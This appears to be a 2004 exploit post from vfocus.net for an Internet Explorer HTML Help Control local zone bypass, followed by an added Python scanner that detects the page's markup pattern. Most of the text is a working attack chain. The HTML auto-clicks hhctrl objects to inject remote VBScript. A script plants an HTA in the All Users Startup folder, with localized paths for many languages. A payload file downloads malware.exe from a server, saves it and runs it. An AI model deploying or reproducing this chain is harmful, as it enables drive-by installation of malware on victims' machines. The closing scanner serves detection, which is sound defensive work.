Internet Explorer (<= XP SP2) HTML Help Control Local Zone Bypass Exploit
Source: vfocus.net  Author: vfocus  Published: 2004-12-26

Solution: Set the security level for all zones to "High" in Internet Explorer.

// sp2rc.htm //

<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\
PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>
<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:
execScript("document.write(\"<script language=\\\"vbscript\\\"
src=\\\"http://site/writehta.txt\\\"\"+String.fromCharCode(62)+\"
</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>

// writehta.txt //

Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://server;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta",
adPersistXML
// Spanish \Documents and Settings\All Users\Menu Inicio\Programas\Inicio\
// French \Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage
// Danish \Documents and Settings\All Users\Menuen Start\Programmer\Start\
// Dutch \Documents and Settings\All Users\Menu Start\Programma's\Opstarten\
// Polish \Documents and Settings\All Users\Menu Start\Programy\Autostart\
// Italian \Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\
// Finn \Documents and Settings\All Users\Kaynnista-valikko\Ohjelmat\Kaynnistys\
// Turkish \Documents and Settings\All Users\Start Menu\Programlar\BASLANGIC\
// Norwegian \Documents and Settings\All Users\Start-meny\Programmer\Oppstart\
// Swedish \Documents and Settings\All Users\Start-menyn\Program\Autostart\
// Portuguese \Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\
// German \Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\
rs.close
conn.close
window.close

// f00bar.txt //

"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://server/malware.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""
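
For triage of saved pages or proxy captures, the markup pattern in sp2rc.htm can be detected statically. The scanner below is an added example, not part of the original post: it flags HTML Help control objects (the CLSID used above) whose ItemN parameters carry a `command;` target with a `javascript:` or `file:` scheme, and lists objects whose `HHClick()` is invoked from script. The `vbscript:` check, the function names and the sample input are assumptions made for the example.

```python
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx), taken from the page.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
RISKY_ITEM = re.compile(r"^command;\s*(javascript|vbscript|file):", re.I)

class HHCtrlScanner(HTMLParser):
    """Flags hhctrl <object>s whose ItemN params point at script or file targets."""
    def __init__(self):
        super().__init__()
        self.findings = []    # (object id, param name, scheme)
        self._current = None  # id of the hhctrl object being parsed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip()
            self._current = a.get("id", "?") if clsid == HHCTRL_CLSID else None
        elif tag == "param" and self._current is not None:
            # Values may be wrapped across lines; collapse whitespace first.
            value = re.sub(r"\s+", " ", a.get("value", "")).strip()
            m = RISKY_ITEM.match(value)
            if a.get("name", "").lower().startswith("item") and m:
                self.findings.append((self._current, a["name"], m.group(1).lower()))

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None

def scan(html):
    """Return (risky params, ids whose HHClick() is called from script)."""
    scanner = HHCtrlScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings, sorted(set(re.findall(r"(\w+)\.HHClick\s*\(", html)))

# Constructed sample input (placeholders only, not the page's markup).
SAMPLE = """
<object id="a" classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
<param name="Command" value="Related Topics, MENU">
<param name="Item1" value="command;file://C:\\WINDOWS\\placeholder.htm"></object>
<object id="b" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<param name="Item1" value='command;javascript:
placeholder()'></object>
<object id="c" classid="clsid:00000000-0000-0000-0000-000000000000">
<param name="Item1" value="command;javascript:placeholder()"></object>
<script>a.HHClick(); setTimeout("b.HHClick()", 100);</script>
"""
print(scan(SAMPLE))
```

An object that is both flagged and auto-clicked from script is the combination the page's markup relies on; either signal alone is weaker evidence.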



 